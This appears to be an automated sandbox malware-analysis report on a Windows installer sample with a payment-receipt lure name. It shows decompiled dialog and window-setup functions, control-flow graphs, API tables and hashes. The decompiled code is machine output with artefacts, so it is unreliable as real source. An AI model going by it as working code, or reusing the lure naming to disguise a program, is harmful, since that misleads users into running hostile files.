                                        control_flow_graph 190 403d1b-403d2d 191 403d33-403d39 190->191 192 403e6e-403e7d 190->192 191->192 193 403d3f-403d48 191->193 194 403ecc-403ee1 192->194 195 403e7f-403ec7 GetDlgItem * 2 call 4041f4 SetClassLongW call 40140b 192->195 196 403d4a-403d57 SetWindowPos 193->196 197 403d5d-403d60 193->197 199 403f21-403f26 call 404240 194->199 200 403ee3-403ee6 194->200 195->194 196->197 202 403d62-403d74 ShowWindow 197->202 203 403d7a-403d80 197->203 208 403f2b-403f46 199->208 205 403ee8-403ef3 call 401389 200->205 206 403f19-403f1b 200->206 202->203 209 403d82-403d97 DestroyWindow 203->209 210 403d9c-403d9f 203->210 205->206 221 403ef5-403f14 SendMessageW 205->221 206->199 207 4041c1 206->207 216 4041c3-4041ca 207->216 214 403f48-403f4a call 40140b 208->214 215 403f4f-403f55 208->215 217 40419e-4041a4 209->217 219 403da1-403dad SetWindowLongW 210->219 220 403db2-403db8 210->220 214->215 224 403f5b-403f66 215->224 225 40417f-404198 DestroyWindow EndDialog 215->225 217->207 223 4041a6-4041ac 217->223 219->216 226 403e5b-403e69 call 40425b 220->226 227 403dbe-403dcf GetDlgItem 220->227 221->216 223->207 229 4041ae-4041b7 ShowWindow 223->229 224->225 230 403f6c-403fb9 call 406281 call 4041f4 * 3 GetDlgItem 224->230 225->217 226->216 231 403dd1-403de8 SendMessageW IsWindowEnabled 227->231 232 403dee-403df1 227->232 229->207 260 403fc3-403fff ShowWindow KiUserCallbackDispatcher call 404216 EnableWindow 230->260 261 403fbb-403fc0 230->261 231->207 231->232 233 403df3-403df4 232->233 234 403df6-403df9 232->234 237 403e24-403e29 call 4041cd 233->237 238 403e07-403e0c 234->238 239 403dfb-403e01 234->239 237->226 241 403e42-403e55 SendMessageW 238->241 243 403e0e-403e14 238->243 239->241 242 403e03-403e05 239->242 241->226 242->237 246 403e16-403e1c call 40140b 243->246 247 403e2b-403e34 call 40140b 243->247 258 403e22 246->258 247->226 256 403e36-403e40 247->256 256->258 258->237 264 404001-404002 260->264 265 404004 260->265 261->260 266 404006-404034 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404036-404047 SendMessageW 266->267 268 404049 266->268 269 40404f-40408e call 404229 call 403cfc call 40625f lstrlenW call 406281 SetWindowTextW call 401389 267->269 268->269 269->208 280 404094-404096 269->280 280->208 281 40409c-4040a0 280->281 282 4040a2-4040a8 281->282 283 4040bf-4040d3 DestroyWindow 281->283 282->207 284 4040ae-4040b4 282->284 283->217 285 4040d9-404106 CreateDialogParamW 283->285 284->208 286 4040ba 284->286 285->217 287 40410c-404163 call 4041f4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->207 287->207 292 404165-404178 ShowWindow call 404240 287->292 294 40417d 292->294 294->217
                                        C-Code - Quality: 84%
                                        			E00403D1B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                        				struct HWND__* _v32;
                                        				void* _v84;
                                        				void* _v88;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t37;
                                        				signed int _t39;
                                        				signed int _t41;
                                        				struct HWND__* _t51;
                                        				signed int _t70;
                                        				struct HWND__* _t76;
                                        				signed int _t89;
                                        				struct HWND__* _t94;
                                        				signed int _t102;
                                        				int _t106;
                                        				signed int _t118;
                                        				signed int _t119;
                                        				int _t120;
                                        				signed int _t125;
                                        				struct HWND__* _t128;
                                        				struct HWND__* _t129;
                                        				int _t130;
                                        				long _t133;
                                        				int _t135;
                                        				int _t136;
                                        				void* _t137;
                                        				void* _t145;
                                        
                                        				_t118 = _a8;
                                        				if(_t118 == 0x110 || _t118 == 0x408) {
                                        					_t37 = _a12;
                                        					_t128 = _a4;
                                        					__eflags = _t118 - 0x110;
                                        					 *0x7a1f08 = _t37;
                                        					if(_t118 == 0x110) {
                                        						 *0x7a8a28 = _t128;
                                        						 *0x7a1f1c = GetDlgItem(_t128, "true");
                                        						_t94 = GetDlgItem(_t128, 2);
                                        						_push(0xffffffff);
                                        						_push(0x1c);
                                        						 *0x79fee8 = _t94;
                                        						E004041F4(_t128);
                                        						SetClassLongW(_t128, 0xfffffff2,  *0x7a7a08);
                                        						 *0x7a79ec = E0040140B(4);
                                        						_t37 = 1;
                                        						__eflags = 1;
                                        						 *0x7a1f08 = 1;
                                        					}
                                        					_t125 =  *0x40a368; // 0x0
                                        					_t136 = 0;
                                        					_t133 = (_t125 << 6) +  *0x7a8a60;
                                        					__eflags = _t125;
                                        					if(_t125 < 0) {
                                        						L34:
                                        						E00404240(0x40b);
                                        						while(1) {
                                        							_t39 =  *0x7a1f08;
                                        							 *0x40a368 =  *0x40a368 + _t39;
                                        							_t133 = _t133 + (_t39 << 6);
                                        							_t41 =  *0x40a368; // 0x0
                                        							__eflags = _t41 -  *0x7a8a64;
                                        							if(_t41 ==  *0x7a8a64) {
                                        								E0040140B("true");
                                        							}
                                        							__eflags =  *0x7a79ec - _t136; // 0x0
                                        							if(__eflags != 0) {
                                        								break;
                                        							}
                                        							__eflags =  *0x40a368 -  *0x7a8a64; // 0x0
                                        							if(__eflags >= 0) {
                                        								break;
                                        							}
                                        							_t119 =  *(_t133 + 0x14);
                                        							E00406281(_t119, _t128, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                                        							_push(0xfffffc19);
                                        							E004041F4(_t128);
                                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                        							_push(0xfffffc1b);
                                        							E004041F4(_t128);
                                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                                        							_push(0xfffffc1a);
                                        							E004041F4(_t128);
                                        							_t51 = GetDlgItem(_t128, 3);
                                        							__eflags =  *0x7a8acc - _t136;
                                        							_v32 = _t51;
                                        							if( *0x7a8acc != _t136) {
                                        								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                        								__eflags = _t119;
                                        							}
                                        							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                        							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                        							E00404216(_t119 & 0x00000002);
                                        							_t120 = _t119 & 0x00000004;
                                        							EnableWindow( *0x79fee8, _t120);
                                        							__eflags = _t120 - _t136;
                                        							if(_t120 == _t136) {
                                        								_push("true");
                                        							} else {
                                        								_push(_t136);
                                        							}
                                        							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                        							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, "true");
                                        							__eflags =  *0x7a8acc - _t136;
                                        							if( *0x7a8acc == _t136) {
                                        								_push( *0x7a1f1c);
                                        							} else {
                                        								SendMessageW(_t128, 0x401, 2, _t136);
                                        								_push( *0x79fee8);
                                        							}
                                        							E00404229();
                                        							E0040625F(0x7a1f20, E00403CFC());
                                        							E00406281(0x7a1f20, _t128, _t133,  &(0x7a1f20[lstrlenW(0x7a1f20)]),  *((intOrPtr*)(_t133 + 0x18)));
                                        							SetWindowTextW(_t128, 0x7a1f20); // executed
                                        							_push(_t136);
                                        							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                        							__eflags = _t70;
                                        							if(_t70 != 0) {
                                        								continue;
                                        							} else {
                                        								__eflags =  *_t133 - _t136;
                                        								if( *_t133 == _t136) {
                                        									continue;
                                        								}
                                        								__eflags =  *(_t133 + 4) - 5;
                                        								if( *(_t133 + 4) != 5) {
                                        									DestroyWindow( *0x7a79f8); // executed
                                        									 *0x7a0ef8 = _t133;
                                        									__eflags =  *_t133 - _t136;
                                        									if( *_t133 <= _t136) {
                                        										goto L58;
                                        									}
                                        									_t76 = CreateDialogParamW( *0x7a8a20,  *_t133 +  *0x7a7a00 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
                                        									__eflags = _t76 - _t136;
                                        									 *0x7a79f8 = _t76;
                                        									if(_t76 == _t136) {
                                        										goto L58;
                                        									}
                                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                        									_push(6);
                                        									E004041F4(_t76);
                                        									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                        									ScreenToClient(_t128, _t137 + 0x10);
                                        									SetWindowPos( *0x7a79f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                        									_push(_t136);
                                        									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                        									__eflags =  *0x7a79ec - _t136; // 0x0
                                        									if(__eflags != 0) {
                                        										goto L61;
                                        									}
                                        									ShowWindow( *0x7a79f8, 8); // executed
                                        									E00404240(0x405);
                                        									goto L58;
                                        								}
                                        								__eflags =  *0x7a8acc - _t136;
                                        								if( *0x7a8acc != _t136) {
                                        									goto L61;
                                        								}
                                        								__eflags =  *0x7a8ac0 - _t136;
                                        								if( *0x7a8ac0 != _t136) {
                                        									continue;
                                        								}
                                        								goto L61;
                                        							}
                                        						}
                                        						DestroyWindow( *0x7a79f8);
                                        						 *0x7a8a28 = _t136;
                                        						EndDialog(_t128,  *0x7a06f0);
                                        						goto L58;
                                        					} else {
                                        						__eflags = _t37 - 1;
                                        						if(_t37 != 1) {
                                        							L33:
                                        							__eflags =  *_t133 - _t136;
                                        							if( *_t133 == _t136) {
                                        								goto L61;
                                        							}
                                        							goto L34;
                                        						}
                                        						_push(0);
                                        						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                        						__eflags = _t89;
                                        						if(_t89 == 0) {
                                        							goto L33;
                                        						}
                                        						SendMessageW( *0x7a79f8, 0x40f, 0, "true");
                                        						__eflags =  *0x7a79ec - _t136; // 0x0
                                        						return 0 | __eflags == 0x00000000;
                                        					}
                                        				} else {
                                        					_t128 = _a4;
                                        					_t136 = 0;
                                        					if(_t118 == 0x47) {
                                        						SetWindowPos( *0x7a1f00, _t128, 0, 0, 0, 0, 0x13);
                                        					}
                                        					if(_t118 == 5) {
                                        						asm("sbb eax, eax");
                                        						ShowWindow( *0x7a1f00,  ~(_a12 - 1) & _t118);
                                        					}
                                        					if(_t118 != 0x40d) {
                                        						__eflags = _t118 - 0x11;
                                        						if(_t118 != 0x11) {
                                        							__eflags = _t118 - 0x111;
                                        							if(_t118 != 0x111) {
                                        								L26:
                                        								return E0040425B(_t118, _a12, _a16);
                                        							}
                                        							_t135 = _a12 & 0x0000ffff;
                                        							_t129 = GetDlgItem(_t128, _t135);
                                        							__eflags = _t129 - _t136;
                                        							if(_t129 == _t136) {
                                        								L13:
                                        								__eflags = _t135 - 1;
                                        								if(_t135 != 1) {
                                        									__eflags = _t135 - 3;
                                        									if(_t135 != 3) {
                                        										_t130 = 2;
                                        										__eflags = _t135 - _t130;
                                        										if(_t135 != _t130) {
                                        											L25:
                                        											SendMessageW( *0x7a79f8, 0x111, _a12, _a16);
                                        											goto L26;
                                        										}
                                        										__eflags =  *0x7a8acc - _t136;
                                        										if( *0x7a8acc == _t136) {
                                        											_t102 = E0040140B(3);
                                        											__eflags = _t102;
                                        											if(_t102 != 0) {
                                        												goto L26;
                                        											}
                                        											 *0x7a06f0 = 1;
                                        											L21:
                                        											_push(0x78);
                                        											L22:
                                        											E004041CD();
                                        											goto L26;
                                        										}
                                        										E0040140B(_t130);
                                        										 *0x7a06f0 = _t130;
                                        										goto L21;
                                        									}
                                        									__eflags =  *0x40a368 - _t136; // 0x0
                                        									if(__eflags <= 0) {
                                        										goto L25;
                                        									}
                                        									_push(0xffffffff);
                                        									goto L22;
                                        								}
                                        								_push(_t135);
                                        								goto L22;
                                        							}
                                        							SendMessageW(_t129, 0xf3, _t136, _t136);
                                        							_t106 = IsWindowEnabled(_t129);
                                        							__eflags = _t106;
                                        							if(_t106 == 0) {
                                        								goto L61;
                                        							}
                                        							goto L13;
                                        						}
                                        						SetWindowLongW(_t128, _t136, _t136);
                                        						return 1;
                                        					} else {
                                        						DestroyWindow( *0x7a79f8);
                                        						 *0x7a79f8 = _a12;
                                        						L58:
                                        						if( *0x7a3f20 == _t136) {
                                        							_t145 =  *0x7a79f8 - _t136; // 0x10384
                                        							if(_t145 != 0) {
                                        								ShowWindow(_t128, 0xa); // executed
                                        								 *0x7a3f20 = 1;
                                        							}
                                        						}
                                        						L61:
                                        						return 0;
                                        					}
                                        				}
                                        			}































                                        0x00403d24
                                        0x00403d2d
                                        0x00403e6e
                                        0x00403e72
                                        0x00403e76
                                        0x00403e78
                                        0x00403e7d
                                        0x00403e88
                                        0x00403e93
                                        0x00403e98
                                        0x00403e9a
                                        0x00403e9c
                                        0x00403e9f
                                        0x00403ea4
                                        0x00403eb2
                                        0x00403ebf
                                        0x00403ec6
                                        0x00403ec6
                                        0x00403ec7
                                        0x00403ec7
                                        0x00403ecc
                                        0x00403ed2
                                        0x00403ed9
                                        0x00403edf
                                        0x00403ee1
                                        0x00403f21
                                        0x00403f26
                                        0x00403f2b
                                        0x00403f2b
                                        0x00403f30
                                        0x00403f39
                                        0x00403f3b
                                        0x00403f40
                                        0x00403f46
                                        0x00403f4a
                                        0x00403f4a
                                        0x00403f4f
                                        0x00403f55
                                        0x00000000
                                        0x00000000
                                        0x00403f60
                                        0x00403f66
                                        0x00000000
                                        0x00000000
                                        0x00403f6f
                                        0x00403f77
                                        0x00403f7c
                                        0x00403f7f
                                        0x00403f85
                                        0x00403f8a
                                        0x00403f8d
                                        0x00403f93
                                        0x00403f98
                                        0x00403f9b
                                        0x00403fa1
                                        0x00403fa9
                                        0x00403faf
                                        0x00403fb5
                                        0x00403fb9
                                        0x00403fc0
                                        0x00403fc0
                                        0x00403fc0
                                        0x00403fca
                                        0x00403fdc
                                        0x00403fe8
                                        0x00403fed
                                        0x00403ff7
                                        0x00403ffd
                                        0x00403fff
                                        0x00404004
                                        0x00404001
                                        0x00404001
                                        0x00404001
                                        0x00404014
                                        0x0040402c
                                        0x0040402e
                                        0x00404034
                                        0x00404049
                                        0x00404036
                                        0x0040403f
                                        0x00404041
                                        0x00404041
                                        0x0040404f
                                        0x00404060
                                        0x00404076
                                        0x0040407d
                                        0x00404083
                                        0x00404087
                                        0x0040408c
                                        0x0040408e
                                        0x00000000
                                        0x00404094
                                        0x00404094
                                        0x00404096
                                        0x00000000
                                        0x00000000
                                        0x0040409c
                                        0x004040a0
                                        0x004040c5
                                        0x004040cb
                                        0x004040d1
                                        0x004040d3
                                        0x00000000
                                        0x00000000
                                        0x004040f9
                                        0x004040ff
                                        0x00404101
                                        0x00404106
                                        0x00000000
                                        0x00000000
                                        0x0040410c
                                        0x0040410f
                                        0x00404112
                                        0x00404129
                                        0x00404135
                                        0x0040414e
                                        0x00404154
                                        0x00404158
                                        0x0040415d
                                        0x00404163
                                        0x00000000
                                        0x00000000
                                        0x0040416d
                                        0x00404178
                                        0x00000000
                                        0x00404178
                                        0x004040a2
                                        0x004040a8
                                        0x00000000
                                        0x00000000
                                        0x004040ae
                                        0x004040b4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004040ba
                                        0x0040408e
                                        0x00404185
                                        0x00404191
                                        0x00404198
                                        0x00000000
                                        0x00403ee3
                                        0x00403ee3
                                        0x00403ee6
                                        0x00403f19
                                        0x00403f19
                                        0x00403f1b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403f1b
                                        0x00403ee8
                                        0x00403eec
                                        0x00403ef1
                                        0x00403ef3
                                        0x00000000
                                        0x00000000
                                        0x00403f03
                                        0x00403f0b
                                        0x00000000
                                        0x00403f11
                                        0x00403d3f
                                        0x00403d3f
                                        0x00403d43
                                        0x00403d48
                                        0x00403d57
                                        0x00403d57
                                        0x00403d60
                                        0x00403d69
                                        0x00403d74
                                        0x00403d74
                                        0x00403d80
                                        0x00403d9c
                                        0x00403d9f
                                        0x00403db2
                                        0x00403db8
                                        0x00403e5b
                                        0x00000000
                                        0x00403e64
                                        0x00403dbe
                                        0x00403dcb
                                        0x00403dcd
                                        0x00403dcf
                                        0x00403dee
                                        0x00403dee
                                        0x00403df1
                                        0x00403df6
                                        0x00403df9
                                        0x00403e09
                                        0x00403e0a
                                        0x00403e0c
                                        0x00403e42
                                        0x00403e55
                                        0x00000000
                                        0x00403e55
                                        0x00403e0e
                                        0x00403e14
                                        0x00403e2d
                                        0x00403e32
                                        0x00403e34
                                        0x00000000
                                        0x00000000
                                        0x00403e36
                                        0x00403e22
                                        0x00403e22
                                        0x00403e24
                                        0x00403e24
                                        0x00000000
                                        0x00403e24
                                        0x00403e17
                                        0x00403e1c
                                        0x00000000
                                        0x00403e1c
                                        0x00403dfb
                                        0x00403e01
                                        0x00000000
                                        0x00000000
                                        0x00403e03
                                        0x00000000
                                        0x00403e03
                                        0x00403df3
                                        0x00000000
                                        0x00403df3
                                        0x00403dd9
                                        0x00403de0
                                        0x00403de6
                                        0x00403de8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403de8
                                        0x00403da4
                                        0x00000000
                                        0x00403d82
                                        0x00403d88
                                        0x00403d92
                                        0x0040419e
                                        0x004041a4
                                        0x004041a6
                                        0x004041ac
                                        0x004041b1
                                        0x004041b7
                                        0x004041b7
                                        0x004041ac
                                        0x004041c1
                                        0x00000000
                                        0x004041c1
                                        0x00403d80

                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
                                        • ShowWindow.USER32(?), ref: 00403D74
                                        • DestroyWindow.USER32 ref: 00403D88
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
                                        • GetDlgItem.USER32(?,?), ref: 00403DC5
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
                                        • IsWindowEnabled.USER32(00000000), ref: 00403DE0
                                        • GetDlgItem.USER32(?,?), ref: 00403E8E
                                        • GetDlgItem.USER32(?,00000002), ref: 00403E98
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
                                        • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F03
                                        • GetDlgItem.USER32(?,00000003), ref: 00403FA9
                                        • ShowWindow.USER32(00000000,?), ref: 00403FCA
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
                                        • EnableWindow.USER32(?,?), ref: 00403FF7
                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040400D
                                        • EnableMenuItem.USER32(00000000), ref: 00404014
                                        • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040402C
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
                                        • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
                                        • SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
                                        • ShowWindow.USER32(?,0000000A), ref: 004041B1
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 3282139019-0
                                        • Opcode ID: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
                                        • Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
                                        • Opcode Fuzzy Hash: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
                                        • Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 295 40396d-403985 call 406639 298 403987-403997 call 4061a6 295->298 299 403999-4039d0 call 40612d 295->299 307 4039f3-403a1c call 403c43 call 405c38 298->307 303 4039d2-4039e3 call 40612d 299->303 304 4039e8-4039ee lstrcatW 299->304 303->304 304->307 313 403a22-403a27 307->313 314 403aae-403ab6 call 405c38 307->314 313->314 315 403a2d-403a55 call 40612d 313->315 320 403ac4-403ae9 LoadImageW 314->320 321 403ab8-403abf call 406281 314->321 315->314 325 403a57-403a5b 315->325 323 403b6a-403b72 call 40140b 320->323 324 403aeb-403b1b RegisterClassW 320->324 321->320 338 403b74-403b77 323->338 339 403b7c-403b87 call 403c43 323->339 326 403b21-403b65 SystemParametersInfoW CreateWindowExW 324->326 327 403c39 324->327 329 403a6d-403a79 lstrlenW 325->329 330 403a5d-403a6a call 405b5d 325->330 326->323 332 403c3b-403c42 327->332 333 403aa1-403aa9 call 405b30 call 40625f 329->333 334 403a7b-403a89 lstrcmpiW 329->334 330->329 333->314 334->333 337 403a8b-403a95 GetFileAttributesW 334->337 341 403a97-403a99 337->341 342 403a9b-403a9c call 405b7c 337->342 338->332 348 403c10-403c11 call 405396 339->348 349 403b8d-403ba7 ShowWindow call 4065c9 339->349 341->333 341->342 342->333 352 403c16-403c18 348->352 356 403bb3-403bc5 GetClassInfoW 349->356 357 403ba9-403bae call 4065c9 349->357 354 403c32-403c34 call 40140b 352->354 355 403c1a-403c20 352->355 354->327 355->338 360 403c26-403c2d call 40140b 355->360 358 403bc7-403bd7 GetClassInfoW RegisterClassW 356->358 359 403bdd-403c00 DialogBoxParamW call 40140b 356->359 357->356 358->359 365 403c05-403c0e call 4038bd 359->365 360->338 365->332
                                        C-Code - Quality: 96%
                                        			E0040396D(void* __eflags) {
                                        				intOrPtr _v4;
                                        				intOrPtr _v8;
                                        				int _v12;
                                        				void _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t22;
                                        				void* _t30;
                                        				void* _t32;
                                        				int _t33;
                                        				void* _t36;
                                        				int _t39;
                                        				int _t40;
                                        				intOrPtr _t41;
                                        				int _t44;
                                        				short _t63;
                                        				WCHAR* _t65;
                                        				signed char _t69;
                                        				WCHAR* _t76;
                                        				intOrPtr _t82;
                                        				WCHAR* _t87;
                                        
                                        				_t82 =  *0x7a8a34;
                                        				_t22 = E00406639(2);
                                        				_t90 = _t22;
                                        				if(_t22 == 0) {
                                        					_t76 = 0x7a1f20;
                                        					L"1033" = 0x30;
                                        					 *0x7b5002 = 0x78;
                                        					 *0x7b5004 = 0;
                                        					E0040612D(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f20, 0);
                                        					__eflags =  *0x7a1f20;
                                        					if(__eflags == 0) {
                                        						E0040612D(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x7a1f20, 0);
                                        					}
                                        					lstrcatW(L"1033", _t76);
                                        				} else {
                                        					E004061A6(L"1033",  *_t22() & 0x0000ffff);
                                        				}
                                        				E00403C43(_t78, _t90);
                                        				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated";
                                        				 *0x7a8ac0 =  *0x7a8a3c & 0x00000020;
                                        				 *0x7a8adc = 0x10000;
                                        				if(E00405C38(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated") != 0) {
                                        					L16:
                                        					if(E00405C38(_t98, _t86) == 0) {
                                        						E00406281(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                        					}
                                        					_t30 = LoadImageW( *0x7a8a20, 0x67, "true", 0, 0, 0x8040); // executed
                                        					 *0x7a7a08 = _t30;
                                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                        						L21:
                                        						if(E0040140B(0) == 0) {
                                        							_t32 = E00403C43(_t78, __eflags);
                                        							__eflags =  *0x7a8ae0;
                                        							if( *0x7a8ae0 != 0) {
                                        								_t33 = E00405396(_t32, 0);
                                        								__eflags = _t33;
                                        								if(_t33 == 0) {
                                        									E0040140B("true");
                                        									goto L33;
                                        								}
                                        								__eflags =  *0x7a79ec; // 0x0
                                        								if(__eflags == 0) {
                                        									E0040140B(2);
                                        								}
                                        								goto L22;
                                        							}
                                        							ShowWindow( *0x7a1f00, 5); // executed
                                        							_t39 = E004065C9("RichEd20"); // executed
                                        							__eflags = _t39;
                                        							if(_t39 == 0) {
                                        								E004065C9("RichEd32");
                                        							}
                                        							_t87 = L"RichEdit20W";
                                        							_t40 = GetClassInfoW(0, _t87, 0x7a79c0);
                                        							__eflags = _t40;
                                        							if(_t40 == 0) {
                                        								GetClassInfoW(0, L"RichEdit", 0x7a79c0);
                                        								 *0x7a79e4 = _t87;
                                        								RegisterClassW(0x7a79c0);
                                        							}
                                        							_t41 =  *0x7a7a00; // 0x0
                                        							_t44 = DialogBoxParamW( *0x7a8a20, _t41 + 0x00000069 & 0x0000ffff, 0, E00403D1B, 0); // executed
                                        							E004038BD(E0040140B(5), "true");
                                        							return _t44;
                                        						}
                                        						L22:
                                        						_t36 = 2;
                                        						return _t36;
                                        					} else {
                                        						_t78 =  *0x7a8a20;
                                        						 *0x7a79c4 = E00401000;
                                        						 *0x7a79d0 =  *0x7a8a20;
                                        						 *0x7a79d4 = _t30;
                                        						 *0x7a79e4 = 0x40a380;
                                        						if(RegisterClassW(0x7a79c0) == 0) {
                                        							L33:
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                        						 *0x7a1f00 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a20, 0);
                                        						goto L21;
                                        					}
                                        				} else {
                                        					_t78 =  *(_t82 + 0x48);
                                        					_t92 = _t78;
                                        					if(_t78 == 0) {
                                        						goto L16;
                                        					}
                                        					_t76 = 0x7a69c0;
                                        					E0040612D(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69c0, 0);
                                        					_t63 =  *0x7a69c0; // 0x43
                                        					if(_t63 == 0) {
                                        						goto L16;
                                        					}
                                        					if(_t63 == 0x22) {
                                        						_t76 = 0x7a69c2;
                                        						 *((short*)(E00405B5D(0x7a69c2, 0x22))) = 0;
                                        					}
                                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                        						L15:
                                        						E0040625F(_t86, E00405B30(_t76));
                                        						goto L16;
                                        					} else {
                                        						_t69 = GetFileAttributesW(_t76);
                                        						if(_t69 == 0xffffffff) {
                                        							L14:
                                        							E00405B7C(_t76);
                                        							goto L15;
                                        						}
                                        						_t98 = _t69 & 0x00000010;
                                        						if((_t69 & 0x00000010) != 0) {
                                        							goto L15;
                                        						}
                                        						goto L14;
                                        					}
                                        				}
                                        			}

























                                        0x00403973
                                        0x0040397c
                                        0x00403983
                                        0x00403985
                                        0x00403999
                                        0x004039ab
                                        0x004039b4
                                        0x004039bd
                                        0x004039c4
                                        0x004039c9
                                        0x004039d0
                                        0x004039e3
                                        0x004039e3
                                        0x004039ee
                                        0x00403987
                                        0x00403992
                                        0x00403992
                                        0x004039f3
                                        0x004039fd
                                        0x00403a06
                                        0x00403a0b
                                        0x00403a1c
                                        0x00403aae
                                        0x00403ab6
                                        0x00403abf
                                        0x00403abf
                                        0x00403ad5
                                        0x00403adb
                                        0x00403ae9
                                        0x00403b6a
                                        0x00403b72
                                        0x00403b7c
                                        0x00403b81
                                        0x00403b87
                                        0x00403c11
                                        0x00403c16
                                        0x00403c18
                                        0x00403c34
                                        0x00000000
                                        0x00403c34
                                        0x00403c1a
                                        0x00403c20
                                        0x00403c28
                                        0x00403c28
                                        0x00000000
                                        0x00403c20
                                        0x00403b95
                                        0x00403ba0
                                        0x00403ba5
                                        0x00403ba7
                                        0x00403bae
                                        0x00403bae
                                        0x00403bb9
                                        0x00403bc1
                                        0x00403bc3
